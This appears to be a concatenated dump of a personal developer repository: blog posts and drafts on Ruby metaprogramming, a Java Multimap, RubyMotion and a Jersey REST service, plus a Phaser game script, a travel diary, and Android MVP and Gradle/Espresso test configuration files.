Above snippet has test cases for trying our `try()` method in ruby. First test ensures that the resource is closed after the use, and the second test ensures that the resource gets closed even if an exception occurs. To make these tests pass we have to define a try method on the `Kernel` which will take a block and ensure that the resource is closed.
{% highlight ruby %}
module Kernel
def try(resource)
begin
yield
ensure
resource.close
end
end
end
{% endhighlight %}
Let's run our tests to see if they pass.
{% highlight bash %}
% ruby closeresource.rb
Running tests:
..
Finished tests in 0.001241s, 1612.2258 tests/s, 2418.3387 assertions/s.
2 tests, 3 assertions, 0 failures, 0 errors, 0 skips
{% endhighlight %}
Most of the places where we'd use loops in Java, can be replaced by blocks in Ruby. For example: [each](http://ruby-doc.org/core-1.9.3/Enumerator.html#method-i-each), [group_by](http://ruby-doc.org/core-1.9.3/Enumerable.html#method-i-group_by), [reject](http://ruby-doc.org/core-1.9.3/Enumerable.html#method-i-reject) etc.
## instance_eval
`instance_eval` gives you access to an object's private methods and instance variables. From a java perspective, this is really scary since nothing is really "private". I have a love and hate relationship with "private" methods in Java. I understand that they are a very, very important design concepts but who are we trying to hide these "private/protected" methods from? It makes sense if you are writing an API though.
## Procs and lambda
Since a block can't be called without an object, `Proc` provides a block that has been turned into an object. `lambda` is similar to a proc with subtle differences. In short, there are two differences in `proc` and `lambda`: 1)`return`, in lambda return just returns from itself, however, in `proc`, it returns from the scope where proc was defined. 2) `arity`, lambda's are strict about arguments, procs are not. The example below shows the power of lambda. I've tried to take a shot at a simple immitation of the `highline` gem. It makes processing command line input easy by passing `lambdas`.
{% highlight ruby %}
class Pleaser
attr_reader :question
def ask (question, operation)
@question = question
@operation = operation
puts @question
@userinput = gets
end
def results
@operation.call(@userinput)
end
end
todo = Pleaser.new
todo.ask("Things to do?", lambda{|x| x.split(",")})
puts "#{todo.question} = #{todo.results}"
{% endhighlight %}
The `Pleaser` class will take an operation from the user, store it in `@operation`, and process an input from the command line. The operation is executed when `results` is called. Let's see it in action.
{% highlight bash %}
% ruby pleaser.rb
Things to do?
Write code, Drink beer
Things to do? = ["Write code", " Drink beer\n"]
{% endhighlight %}
Using this, we can pass anything in `lambda` to be called by the `Pleaser` class
## Duck Typing and Singleton Methods
Simply, duck typing lets you pass anything as an argument to the method without worrying about the type. Ruby treats methods on objects as messages that are being passed back and forth rather than what class they belong to. This really takes the burden off the programmers head but I can also understand it would become difficult in a large codebase where developers change from year to year. Furthermore, Ruby allows `singleton_methods`. These methods don't live in a class but "inside the object" (more on this in next section). Let's look at an example.
{% highlight ruby %}
beer = "guinness is awesome"
def beer.awesome?
(self =~ /^guinness/) == 0
end
beer.awesome? => true
beer = "budweiser is awesome"
beer.awesome? => undefined method 'awesome?'
{% endhighlight %}
The above snippet shows that `singleton methods` are defined on a particular object only! This comes in handy at times when we know for sure that a particular instance should have a special behavior. In Java, we'd defined a different class for this type of behavior. Ruby's answer for this is `singleton_methods`. I personally don't like code littered with one-time-used classes.
## Eigen Classes
Eigen classes are hidden classes. In the last section when we defined `singleton_methods` they actually get stored in hidden classes. Hidden classes can be used for class extension. If you are trying to define a `class` method by `including` a module then hidden classes can be utilized. Yet another example:
{% highlight ruby %}
module SomeModule
def some_method
puts "hello"
end
end
class SomeClass
class << self
include SomeModule
end
end
SomeClass.some_method => "hello"
{% endhighlight %}
In the above example, `some_method` is an instance method of the hidden class of `SomeClass` and also a class method of `SomeClass`. To make things easier, Ruby provides the `extends` keyword to do the same thing we did above.
{% highlight ruby %}
module M
def some_soup
puts "NO SOUP FOR YOU!"
end
end
class C
extend M
end
C.some_soup #=> NO SOUP FOR YOU
C.new.some_soup #=> NoMethodError
{% endhighlight %}
In the above snippet, the class extends the module instead of including it. This makes the module methods, class methods of `C`.
## Method Aliases
Method aliases allow you to give an alias name to an existing method. When you redefine the old method, it creates a new method and attaches an existing name to the new method. This means that you still have reference to the old method. So, if you have the need for a method to be surrounded by some code, before or after, you can use method aliases to your advantage. If you think this sounds like AOP, you would be correct. Ruby makes AOP much easier since `alias` is baked right into the language. Check out objectmentor's great presentation on [AOP in Ruby](http://objectmentor.com/resources/articles/AOP_in_Ruby.pdf) for more. Let's look at an example where we surround the `*` method of `Fixnum` class so that result of multiplication is ten times.
{% highlight ruby %}
class Fixnum
alias :orig :*
def * (n)
return self.orig(n).orig(10)
end
end
class BrokenMathTest < Test::Unit::TestCase
def test_broken_math
assert_equal 10, 1*1
assert_equal 60, 3*2
assert_equal 100, -5*-2
end
end
% ruby alias.rb
Running tests:
.
Finished tests in 0.000649s, 1540.5828 tests/s, 4621.7484 assertions/s.
1 tests, 3 assertions, 0 failures, 0 errors, 0 skips
{% endhighlight %}
We keep reference to the old `*` in `orig` and then redefine the `*` to make it ten times.
## Conclusion
The main benefit of knowing all these tricks is to actually start thinking in terms of the language. Ruby treats the programmer as a mature being rather than spoon feeding and holding hands along the way like other languages. However, that maturity should be handled with responsibility and the powers of the language should not be abused by monkey patching the code everywhere. Finally, again thanks to [@nusco](https://twitter.com/#!/nusco) for the awesome book that gets you up to speed on Ruby concepts. In the coming weeks, I'll try to supplement things learned from the book with code on github.
<file_sep>/js/application.js
/*
 * Social-icon hover labels: while the cursor is over an icon, show its name
 * in the #mousing element; clear the label when the cursor leaves.
 *
 * Fix: the original called .hover(fn) with a SINGLE handler, which jQuery
 * binds to both mouseenter and mouseleave — so the "show label" handler also
 * fired when the mouse left the icon, and the label only ended up cleared
 * because of the accidental binding order of the extra .mouseout handler.
 * Explicit mouseenter/mouseleave pairs make the behavior deliberate, and a
 * selector -> label map removes the triplicated copy/paste blocks.
 */
jQuery(document).ready(function($) {
  // Map of icon selector to the label shown while hovering it.
  var hoverLabels = {
    ".twitter": "Twitter",
    ".git": "Github",
    ".rss": "RSS"
  };

  $.each(hoverLabels, function(selector, label) {
    $(selector)
      .mouseenter(function() {
        $("#mousing").text(label);
      })
      .mouseleave(function() {
        // Restore the placeholder space so the element keeps its height.
        $("#mousing").html(" ");
      });
  });
});
<file_sep>/_posts/2012-01-15-self-in-ruby.markdown
---
layout: post
title: Ruby Self
date: 2012-01-15
categories: [ruby,learning]
---
With the beginning of 2012 I've started giving Ruby a serious try. No longer will I depend on quick google searches to help me
through the various ruby scripts I've been writing. Instead I've decided to sit down and understand the basic concepts that make
Ruby such a pleasant ecosystem to work with. This especially holds true when coming from the Java ecosystem, even with new JVM langs
spurring up.
The book I'm reading to feed my Ruby hunger is The Well-Grounded Rubyist. This book is so good that I could not put it down before reading four chapters
in a sitting. Apart from explaining Ruby in an excellent way, the structure and flow of the book are very engaging. Each section ends with a couple
of lines about what the next section will hold; this touch seems to be missing from many technical books.
## Instantiating Self methods of base classes
If you extend from a parent class and wish to use the parent class's self methods then `new` is your friend. Let's look at an example of such a
hierarchy
```ruby
class Parent
def self.to_parent
new.testparent
end
def testparent
puts "testparent"
end
end
class Child < Parent
end
puts Child.to_parent #prints testparent
```
In the above code the `to_parent` is a class method of `Parent`, therefore in order to invoke any instance methods we require an instance of the class
and we can get that by `new`. If `new.testparent` is changed to just `testparent` then the code will fail because inside a `self` instance there is no
`testparent`.
<file_sep>/_posts/2014-12-05-Dodging-Burgers.markdown
---
layout: post
title: Dodging Burgers
date: 2015-12-05
---
A simple game I made while playing around with [Phusion Passenger](https://www.phusionpassenger.com/)
The goal of the game is see how long you can avoid being hit by the randomized burgers dropping from top
The JS source code is available [here](/main.js)
<iframe width="450" height="700" src="/game.html" frameborder="0" allowfullscreen></iframe>
<file_sep>/main.js
// Bootstrap the Phaser game: a 400x490 canvas rendered into the 'game_div'
// element, letting Phaser pick the renderer (Phaser.AUTO).
var game = new Phaser.Game(400, 490, Phaser.AUTO, 'game_div');
// Module-level handle to the enemy sprite most recently recycled by new_enemy.
var enemy
// Namespace for the game's states; only a single 'main' state is defined.
var game_state = {};
game_state.main = function() { };
game_state.main.prototype = {
// Phaser lifecycle hook: queue image loads and set the background colour
// before the state is created.
preload: function() {
this.game.stage.backgroundColor = "#71c5cf";
this.game.load.image('enemy', 'assets/burger.png');
this.game.load.image('player', 'assets/box.png');
},
// Phaser lifecycle hook: build the world — player sprite, a pool of reusable
// enemy sprites, the spawn timer, keyboard input, and the score label.
create: function() {
this.player= this.game.add.sprite(100,400,'player');
// Pre-allocate 200 dead 'enemy' sprites so new_enemy can recycle them
// instead of constructing sprites at runtime.
this.enemies = game.add.group();
this.enemies.createMultiple(200, 'enemy');
// Spawn an enemy (and bump the score) every 750 ms until the state ends.
this.timer = this.game.time.events.loop(750, this.new_enemy, this);
this.cursors = game.input.keyboard.createCursorKeys();
this.score = 0;
// NOTE(review): lives is only decremented in overlap(), which does not
// appear to be wired to anything in this file — confirm intent.
this.lives = 3;
var style = {font: "30px Arial", fill: "#ffffff"};
this.label_score = this.game.add.text(20, 20, "0", style);
},
// Phaser lifecycle hook, called every frame: move the player left/right
// within the x-range (10, 350) and restart the run on any enemy collision.
update: function() {
// Player stops unless an arrow key is held down this frame.
this.player.body.velocity.setTo(0, 0);
if (this.cursors.left.isDown) {
console.log(this.player.body.x)
if (this.player.body.x > 10)
this.player.body.velocity.x = -300;
}
else if (this.cursors.right.isDown) {
console.log(this.player.body.x)
if (this.player.body.x < 350)
this.player.body.velocity.x = 300;
}
// Any touch between the player and an enemy ends the run immediately.
this.game.physics.overlap(this.player, this.enemies, this.restart_game, null, this);
},
// Appears unused in this file — despite the name it nudges horizontal
// velocity, so it looks like a leftover experiment; confirm before removal.
jump: function () {
this.player.body.velocity.x += 5;
},
// Collision callback: cancel the spawn loop and restart the 'main' state
// from scratch (score and lives are re-initialised in create()).
restart_game: function() {
this.game.time.events.remove(this.timer);
this.game.state.start('main');
},
// Appears unused in this file: would consume a life on overlap.
overlap: function () {
this.lives -= 1;
console.log("overlapped");
},
// Timer callback: bump the score, then recycle a dead enemy sprite at a
// random x position above the screen with a random downward gravity.
new_enemy: function () {
this.score += 1;
this.label_score.content = this.score;
enemy = this.enemies.getFirstDead();
// Random horizontal spawn position in [1, 350].
var x = Math.floor(Math.random()*350)+1;
console.log(x);
enemy.reset(x,-100);
// Random fall acceleration in [200, 800).
var y = Math.random() * (800 - 200) + 200;
enemy.body.gravity.y = y;
console.log(enemy.outOfBounds);
}
};
// Register and launch the single game state.
game.state.add('main', game_state.main);
game.state.start('main');
<file_sep>/drafts/2012-03-26-europe-vacation.markdown
---
layout: post
title: Europe Vacation
---
At the beginning of March 2012, my wife and I went on a much-needed vacation to Europe. We visited Lucerne, Paris, Venice, and Rome. We covered everything
in about twelve days, which is a bit hectic for most people, but we enjoyed our on-the-go active schedule. Wanting to do all the planning on our own, we
didn't want to take a packaged trip and had everything planned after weeks of lurking around on TripAdvisor. We made full use of the awesome European
train network.
## Lucerne, Switzerland
We flew directly directly to Zurich Airport and boarded the Airport rail. Instead of some sleezy elevator music, the automated announcements in the airport
rail were made with cowbells ringing in the background. From Zurich Airport train station we boarded the two hour train to Bahnhof station (Lucerne). It
didn't take us long to see the beauty of Lucerne since right outside the train station is part of Lake Lucerne. We had a bit of trouble finding our hotel, but
a nice guy spotted our lost looks and asked if we needed help. He went out of his way to actually walk with us all the way to our hotel. After a few hours
in the hotel, we started our journey to Mt. Pilatus. which involves train from Bahnhof and a cable car all the way up the mountain. The view of the Alps
from top of the mountain is breathtaking. After spending a lot of time up the mountain we grabbed a bite to eat at the restaurant on top of the mountain.
Beer and food tastes much better when view of the Alps comes on the side. An old guy was playing Alphorn which made the experience even better. We spent
the night roaming the local streets of Lucerne. The next day we took the train from Bahnhof to Engelberg and a cable car up to Mt. Titlis. The view of the
Swiss landscape from the cable car as it's about to reach the top of the mountain is amazing. Our only regret at Mt. Titlis was that neither of us knew
how to ski or snowboard. I've snowboarded before, but that resulted in a
fractured ankle as I was coming down a huge slope after just 5 minutes of "training".
Ever since then I've never tried again
<file_sep>/playground.markdown
---
layout: page
---
# Online Mentor
** paid mentor protege program
** gather senior people in different fields
<br/>
# Job Post Board
** specifically for wash-dc area
** specifically for small biss (8A)
** SBA supported?
<file_sep>/_posts/2011-12-08-NFJS.markdown
---
layout: post
title: No Fluff Just Stuff - Reston
date: 2011-12-08
categories: [conferences]
---
I attended my first ever NFJS Software Symposium in Reston on November 4-6, 2011. All the sessions were great and at times I felt the need to clone myself so I could attend some sessions at the same time.
## Sessions
* Spring for XML-Haters - <NAME>
* Testing with Spock - <NAME> (Live Coding!)
* Gradle: Bringing Engineering back to builds - <NAME>
* Effective Java Reloaded - <NAME>
* Art of problem solving - <NAME>
* Emergent Design - <NAME>
* Java Developer's guide to Android Basics - <NAME>ard
* Automating Requirements with Geb and Spock - <NAME>
* Resource Oriented Architectures: REST - <NAME>
* Pragmatic Architecture - Ted Neward
* Architectural Kata Workshop - Ted Neward
<file_sep>/_posts/2012-08-10-Multimap.markdown
---
layout: post
title: Multimaps
date: 2012-08-10
categories: [java,guava]
---
Multimap is a useful datastructure created using a Key, Value pair. In a Multimap a key can be associated with multiple values. So when a Collection is assigned to a Key, the key will hold-on to the Collection of values the second time elements are added to the Collection.
It can be visualized as:
{% highlight ruby %}
"User1" => [1, 2, 3, 4]
"User2" => [3]
{% endhighlight %}
[Guava](http://code.google.com/p/guava-libraries/) and [Apache Commons](http://commons.apache.org/) provide Multimaps and various other useful datastructures built in. But how exactly do these libraries make use of plain Java to create such a datastructure? Let's take a look!
## Interface
Let's build a contract for our MultiMap. There can be various methods in a Multimap but let's just concentrate on the key methods `get, put, and size`.
{% highlight java %}
public interface Multimap <K, V> {
boolean put (K k, V v);
Collection<V> get (K k);
int size();
}
{% endhighlight %}
## Abstract it out
Let's provide an abstract implementation of the Multimap so that the code stays solved
{% highlight java %}
/**
 * Skeletal Multimap implementation: maps each key to a collection of values.
 * Subclasses choose the concrete collection type via {@link #createCollection()}.
 */
public abstract class AbstractMultiMap <K, V> implements Multimap<K, V> {

    /** Backing map from key to its collection of values. */
    private Map <K, Collection<V>> map;
    /** Running count of all values stored across every key. */
    int totalSize;

    protected AbstractMultiMap (Map<K, Collection<V>> map) {
        this.map = map;
    }

    /** Template method: supplies the empty collection used for a brand-new key. */
    abstract Collection<V> createCollection();

    /**
     * Adds the value to the collection associated with the key, creating that
     * collection on first use. The original implementation duplicated the
     * add/put/size++ sequence in both branches; the common tail is now shared.
     *
     * @return always true — the multimap grows on every call
     */
    @Override
    public boolean put(K k, V v) {
        Collection<V> collection = map.get(k);
        if (collection == null) {
            // First value for this key: ask the subclass for a fresh collection.
            collection = createCollection();
            map.put(k, collection);
        }
        collection.add(v);
        totalSize++;
        return true;
    }

    /**
     * Returns the collection of values stored under the key, or null when the
     * key is absent (Map.get already yields null for a missing key, so the
     * explicit containsKey check was redundant).
     */
    @Override
    public Collection<V> get(K k) {
        return map.get(k);
    }

    /** Total number of values stored, not the number of distinct keys. */
    @Override
    public int size() {
        return totalSize;
    }

    public String toString() {
        return map.toString();
    }
}
{% endhighlight %}
The template method `createCollection()` will provide the implementation of what kind of collection we want. The `put` method first checks whether the map already contains the key; if so, the element is added to the pre-existing collection. However, if the key is not found, a new collection is created and assigned as the value for the new key.
## ArrayListMultiMap
`ArrayListMultiMap` will override the templated `createCollection()` method and the constructor will create a Key, Value map.
{% highlight java%}
public class ArrayListMultiMap <K, V> extends AbstractMultiMap <K, V>{
@Override
List<V> createCollection() {
return new ArrayList<V>();
}
ArrayListMultiMap() {
super(new HashMap<K, Collection<V>>());
}
}
{% endhighlight %}
## Test it out
Let's test out what we've built so far. The test will compare a regular HashMap to a MultiMap. We'll create both and assign some lists to them.
{% highlight java %}
public class MultiMapTest {
public static void main(String[] args) {
HashMap<String, Collection<Integer>> map = new HashMap<String, Collection<Integer>>();
ArrayListMultiMap<String, Collection<Integer>> multimap = new ArrayListMultiMap<String, Collection<Integer>>();
ArrayList<Integer> aList = new ArrayList<Integer>() {
{
add(1);
add(2);
}
};
map.put("UserA", aList);
multimap.put("UserA", aList);
System.out.println("map: " + map);
ArrayList<Integer> bList = new ArrayList<Integer>() {
{
add(3);
add(4);
}
};
map.put("UserA", bList);
multimap.put("UserA", bList);
System.out.println("map: " + map);
System.out.println("multimap: " + multimap);
}
}
{% endhighlight %}
Running this class will display an output as below:
{% highlight bash %}
map: {UserA=[1, 2]}
map: {UserA=[3, 4]}
multimap: {UserA=[[1, 2], [3, 4]]}
{% endhighlight %}
Notice that when a collection is assigned to a regular Map for the same key a second time, it replaces the existing value rather than appending to the existing collection like our MultiMap does.
<file_sep>/_posts/2013-04-12-Programming-Ruby-Notes.markdown
---
layout: post
title: RubyMotion
date: 2013-04-12
categories: [ios,ruby]
---
RubyMotion is a platform which lets you write Native iOS apps in plain Ruby. The Ruby code uses the iOS SDK frameworks and classes exactly as intended by Apple. So there is a clean one-to-one mapping with Objective-C functions. Although it helps to atleast be able to make sense of the Objective-C code to be able to convert it to Ruby. This post is a short introduction to RubyMotion and my experience with it so far.
## AppDelegate
`app_delegate.rb` is where the applications comes to life. Controllers can be assigned to the class to take over the role of filling in the screen.
## Controllers
Controller scan be subclassed from various controller classes defined in the iOS SDK. `UITableViewController` or `UIViewController` etc.
Depending on the controller, each will have a `viewDidLoad` method which is where all the action for that controller happens when the controller coems to life.
## Delegate Pattern
[Delegate Pattern](http://en.wikipedia.org/wiki/Delegation_%28programming%29) is followed all throughout the iOS SDK. It enables you to hand values and messages over in your class hierarchy. Classes can become their own delegates as well
## Dispatch::Queue
The `Dispatch::Queue.concurrent.async` can be used to handle concurrent events so that the UI doesn't experience lagginess.
<file_sep>/drafts/2012-02-06-jersey-jackson-guice.markdown
---
layout: post
title: RESTful with Jersey
---
Traditionally web services have been a great mess to deal with largely because of complex WS- [specifications](http://www.whatissoa.com/soaspecs/ws.php)
but the RESTful approach of dealing directly with HTTP methods has simplified web services. However, this post is not about explaining
the REST architecture, but rather about showcasing how to work with Jersey (Java's implementation of REST) along with Jackson (JSON parser).
## Prerequisite
I'm re-iterating the benefits of Jersey which other people, smarter than me, have already written about. Codahale's post about [Jersey](http://codahale.com/what-makes-jersey-interesting-parameter-classes/)
and Shaneal's post about the [modern java ecosystem](http://arantaday.com/the-modern-java-ecosystem) do a great job of explaining jersey and integration of
Guice and Jackson to make it a swiss army knife of webservices. This post and the [code](https://github.com/Omnipresent/pizzajoint) is an extension on
top of their work.
## What are we implementing?
I'm going to create a RESTful API for a pizzajoint. It'll include the basic things like listing orders, placing an order, fetching an order etc.
Something like this can be used by our pizzajoint to create a mobile app for ordering pizza or allowing a third party to place pizza
orders by accessing the webservice.
## Let's get started
We'll start with an `OrderResrouce` class that'll have annotated HTTP REST methods we want to provide the functionality for: - I cover `GET` and `Post`
Let's start with the `GET` method.
{% highlight java %}
@Path("/orders")
@Produces({MediaType.APPLICATION_JSON})
public class OrderResource {
private static final Map<Integer, Order> ORDERS = Maps.newConcurrentMap();
@GET
public Collection<Integer> listOrderIds() {
return ORDERS.keySet();
}
@GET
@Path("{id: [0-9]+}")
public Order getOrder(@PathParam("id") int id) {
final Order order = ORDERS.get(id);
if (order == null) {
throw new WebApplicationException(Response.Status.NOT_FOUND);
}
else
return order;
}
{% endhighlight %}
We've just implemented two methods, first to list orders and second to get a particular order. The `@Path` declares a path from which the
service can be requested and `@Produces` declares MediaType as JSON. We're using a `ConcurrentMap` instead of a database, so the `listOrderIds` method
returns all the order ids. The `getOrder` method defines a `@Path` which means that it'll return the result based on a particular id that is passed in.
Now let's bind our RESTful OrderResource using Guice and see it in action.
{% highlight java %}
@Override
protected Injector getInjector() {
return Guice.createInjector(new JerseyServletModule() {
@Override
protected void configureServlets () {
/* bind the REST resources*/
bind(OrderResource.class);
serve("/rest/*").with(GuiceContainer.class, INIT_PARAMS);
}
});
}
{% endhighlight %}
Guice makes dependency injection easy. In the above code we're taking advantage of the `JerseyServletModule` to bind
`OrderResource` and serving it on `/rest/` path. I love instant gratification and since we've got basic code down, lets see it in action.
{% highlight bash %}
pizzajoint% mvn -Dmaven.tomcat.port=7272 tomcat:run
pizzajoint% curl http://localhost:7272/pizzajoint/rest/orders
[]
pizzajoint% curl -sw "%{http_code}" "http://localhost:7272/pizzajoint/rest/orders/1" -o /dev/null
http_code = 404
{% endhighlight %}
Notice the `404` error thrown when we try to access order `1` when it does not exist. Error handling is important for a webservice since third party
applications will be accessing it.
## So how do we create order?
The REST way - by creating a `POST` request. Just like we annotated a method with `@GET` we can annotate a method with `@Post`, simple eh?
{% highlight java %}
@POST
@Consumes({MediaType.APPLICATION_FORM_URLENCODED})
public int prepareOrder(@FormParam("ordername") String name,
@FormParam("readydate") SimpleDateParam orderDate,
@FormParam("toppings") CsvParam csvToppings) throws IOException, Throwable {
List<Topping> toppings = Lists.newLinkedList();
Date dateOfOrder = orderDate.getValue();
for (String toppingStr : csvToppings.getValue())
toppings.add(MAPPER.readValue("\""+toppingStr+"\"", Topping.class));
final Order newOrder = new Order(name, dateOfOrder, toppings);
final Order oldOrder = ORDERS.put(newOrder.getId(), newOrder);
return newOrder.getId();
}
{% endhighlight %}
This method takes a bunch of `@FormParam`s as options that everyone wants when ordering a pizza. There are more parameters in the [code](https://github.com/Omnipresent/pizzajoint)
but here I explain three distinct parameter types: `String`, `Date`, and `CSV`. Handling a string, `ordername`, is quite simple but a date and bunch of toppings
as comma separated values will be a bit tricky. We want the user to be able to enter a date in a `String` format of `MM/dd/yyyy` and toppings in a `CSV` format
of `chicken,pepperoni,jalepeno`. Let's create `SimpleDateParam` and `SimpleCsvParam` classes.
{% highlight java %}
public class SimpleDateParam {
private static final SimpleDateFormat dateFormat = new SimpleDateFormat("MM/dd/yyyy");
private Date date = new Date();
public SimpleDateParam (String orderDate) throws WebApplicationException {
try {
this.date = dateFormat.parse(orderDate);
}
catch (ParseException e) {
throw new WebApplicationException(
Response
.status(Status.BAD_REQUEST)
.entity(e.getMessage())
.build()
);
}
}
public Date getValue() {
return this.date;
}
}
{% endhighlight %}
{% highlight java %}
public class SimpleCsvParam {
private Iterable<String> toppings;
public SimpleCsvParam (String csvToppings) throws WebApplicationException {
try {
this.toppings = Splitter.on(",").trimResults().omitEmptyStrings().split(csvToppings);
}
catch (IllegalArgumentException e) {
throw new WebApplicationException(
Response
.status(Status.BAD_REQUEST)
.entity(e.getMessage())
.build()
);
}
}
public Iterable<String> getValue() {
return this.toppings;
}
}
{% endhighlight %}
The above two classes represent parameter classes, former for handling date and latter for handling CSV parameters. Having a separate class for each
parameter type can get ugly really fast, there is a lot of DRY potential in these classes. Let's abstract out the commonalities and refactor
{% highlight java %}
public abstract class AbstractParameter <V>{
private final V value;
public AbstractParameter(String param) throws WebApplicationException{
try {
this.value = parse(param);
}
catch (Throwable e) {
throw new WebApplicationException(
Response
.status(Status.BAD_REQUEST)
.entity(e.getMessage())
.build()
);
}
}
public abstract V parse(String param) throws Throwable;
public V getValue() {
return this.value;
}
}
{% endhighlight %}
{% highlight java %}
public class SimpleDateParam extends AbstractParameter<Date>{
private static final SimpleDateFormat simpleDate = new SimpleDateFormat("MM/dd/yyyy");
public SimpleDateParam (String orderDate) {
super(orderDate);
}
public Date parse(String orderDate) throws Throwable {
return simpleDate.parse(orderDate);
}
}
{% endhighlight %}
{% highlight java %}
public class SimpleCsvParam extends AbstractParameter<Iterable<String>> {
public class SimpleCsvParam (String param) {
super (param);
}
public Iterable<String> parse(String param) {
return Splitter.on(",").trimResults().omitEmptyStrings().split(csvToppings);
}
}
{% endhighlight %}
Great, now we've extracted out the common code into AbstractParameter allowing any new parameter class to `extend AbstractParameter`.
Now, let's see the service in action by invoking the `@Post` method.
{% highlight bash %}
pizzajoint% curl -d "ordername=bhaarat&readydate=02/13/2012&toppings=chicken,jalepenos" http://localhost:8080/pizzajoint/rest/orders
[1]
pizzajoint% curl http://localhost:8080/pizzajoint/rest/order
{"id":2,"orderName":"bhaarat","dateOfOrder":"02-13-2012","toppings":["chicken","jalepenos"]}
{% endhighlight %}
In the above code you'll notice that toppings are passed in as `CSV` and the output is shown as a `JSON` array. This is because of the Jackson
JSON parser. I've created a small `Topping` class to serialize and deserialize the passed in toppings.
{% highlight java %}
@JsonSerialize(using = Topping.ToppingSerializer.class)
@JsonDeserialize(using = Topping.ToppingDeserializer.class)
public class Topping {
private final String toppingName;
public Topping (String toppingName) {
this.toppingName = toppingName;
}
public String getToppingName() {
return this.toppingName;
}
public static class ToppingSerializer extends JsonSerializer<Topping> {
@Override
public void serialize(Topping t, JsonGenerator jg, SerializerProvider sp) throws IOException {
jg.writeString(t.getToppingName());
}
}
public static class ToppingDeserializer extends JsonDeserializer<Topping> {
@Override
public Topping deserialize(JsonParser jp, DeserializationContext dc) throws IOException, JsonProcessingException {
String toppingName = jp.getText();
return new Topping(toppingName);
}
}
}
{% endhighlight %}
The above class makes use of the `Jackson` library to serialize and deserialize the objects by overriding the serialize and deserialize methods.
Each topping passed in as a comma separated value is put into a list and mapping using `ObjectMapper` provided by Jackson.
{% highlight java %}
private static final ObjectMapper MAPPER = new ObjectMapper();
List<Topping> toppings = Lists.newLinkedList();
for (String toppingStr : csvToppings.getValue())
toppings.add(MAPPER.readValue("\""+toppingStr+"\"", Topping.class));
{% endhighlight %}
Since `Topping` class is annotated with json serialier and de-serializers, every time a new item is pushed into `ObjectMapper` it goes through the serializer.
---
Give jersey a try the next time you have a need to write a RESTful webservice in java.
| e7786e10197e30bacf072c3d0c0fa504dc94c822 | [
"Markdown",
"JavaScript"
] | 11 | Markdown | Omnipresent/omnipresent.github.com | dc3264e9e386e29af7e162b7d58a0edb5c3b6f7e | b2f7f629ba7dd04857187c131c010342314291a9 |
refs/heads/master | <file_sep>package com.icenler.lib.feature.mvp.base;
import android.support.annotation.NonNull;
public interface IPresenter<V extends BaseView> {
void attachView(@NonNull V viewHandle);
void detachView();
}
<file_sep>apply plugin: 'com.android.application'
android {
compileSdkVersion rootProject.ext.compileSdkVersion
buildToolsVersion rootProject.ext.buildToolsVersion
defaultConfig {
applicationId "com.icenler.test"
minSdkVersion rootProject.ext.minSdkVersion
targetSdkVersion rootProject.ext.targetSdkVersion
versionCode 1
versionName "1.0"
testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner"
}
buildTypes {
release {
minifyEnabled false
proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
}
}
packagingOptions {
exclude 'LICENSE.txt'
}
}
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
testCompile 'junit:junit:4.12'
compile "com.android.support:appcompat-v7:$rootProject.ext.supportLibraryVersion"
compile "com.android.support:design:$rootProject.ext.supportLibraryVersion"
compile "com.android.support:support-annotations:$rootProject.ext.supportLibraryVersion"
compile "com.google.guava:guava:$rootProject.guavaVersion"
// Android Testing Support Library's runner and rules
androidTestCompile(
"com.android.support.test:rules:$rootProject.ext.rulesVersion",
"com.android.support.test:runner:$rootProject.ext.runnerVersion"
)
// Mockito
androidTestCompile(
"org.mockito:mockito-core:$rootProject.ext.mockitoVersion",
// Mockito Dependencies
"com.google.dexmaker:dexmaker:1.2",
"com.google.dexmaker:dexmaker-mockito:1.2")
// Espresso UI Testing
androidTestCompile(
"com.android.support.test.espresso:espresso-core:$rootProject.ext.espressoVersion",
"com.android.support.test.espresso:espresso-intents:$rootProject.ext.espressoVersion",
"com.android.support.test.espresso:espresso-contrib:$rootProject.ext.espressoVersion",
"com.android.support.test.espresso:espresso-web:$rootProject.ext.espressoVersion")
}
/*
ext {
// Sdk and tools
minSdkVersion = 15
targetSdkVersion = 22
compileSdkVersion = 23
buildToolsVersion = '23.0.1'
// App dependencies
supportLibraryVersion = '23.0.1'
guavaVersion = '18.0'
runnerVersion = '0.4.1'
rulesVersion = '0.4.1'
espressoVersion = '2.2.1'
mockitoVersion = '1.10.19'
}
* */
/**
* Android UI自动化测试的框架:
* 1、project/module/build.gradle
* # android -> defaultConfig -> testInstrumentationRunner "android.support.test.runner.AndroidJunitRunner"
* # android -> packagingOptions -> exclude 'LICENSE.txt'
* # android -> dependencies -> compile 'com.android.support:support-annotations:+'
* # android -> dependencies -> androidTestCompile
* - 'com.android.support.test.espresso:espresso-core:2.1'
* - 'com.android.support.test.espresso:espresso-intents:2.1'
* - 'com.android.support.test.espresso:espresso-contrib:2.1'
* - 'com.android.support.test:runner:0.2'
* 2、"Run" > "Edit Configurations" > add "Android Tests"
*
* 3、module/androidTest
* # 创建测试类
* - @Rule 指定测试 Activity
* - @Test 声明测试方法
* - 核心API类:
* * Espresso: 匹配器
 * > onView(ViewMatcher).perform(ViewAction).check(ViewAssertion)
* 用法:寻找文本为 Hello World! 的控件是否显示
* Espresso.onView(ViewMatchers.withText("Hello World!"))
* .check(ViewAssertions.matches(ViewMatchers.isDisplayed()));
*
 * > onData(ObjectMatcher).DataOptions.perform(ViewAction).check(ViewAssertion)
 * DataOptions:
* inAdapterView(Matcher)
* atPosition(Integer)
* onChildView(Matcher)
* 用法:
* Espresso.onData(ViewMatchers.hasFocus())
* .inAdapterView(ViewMatchers.isNotChecked()).atPosition(0).onChildView(ViewMatchers.hasFocus())
* .perform(ViewActions.clearText())
* .check(ViewAssertions.matches(ViewMatchers.isDisplayed()));
*
* * ViewActions: 界面行为工具类
* > Click/Press:
* click()
* doubleClick()
* longClick()
* pressBack()
* pressIMEActionButton()
* pressKey([int/EspressoKey])
* pressMenuKey()
* closeSoftKeyboard()
* openLink()
*
* > Gestures:
* scrollTo()
* swipeLeft()
* swipeRight()
* swipeUp()
* swipeDown()
*
* > Text:
* clearText() 清空文本
* typeText(String) 设置文本
* typeTextInfoFocusedView(String) 设置文本并获取焦点
* replaceText(String) 替换文本
*
* * ViewMatchers: 匹配过滤
* > User Properties
* withId(...) 资源ID匹配
* withText(...) 文本匹配
* withTagKey(...) Tag键匹配
* withTagValue(...) Tag值匹配
* hasContentDescription(...) 是否包含ContentDescription描述
* withContentDescription(...) ContentDescription描述匹配
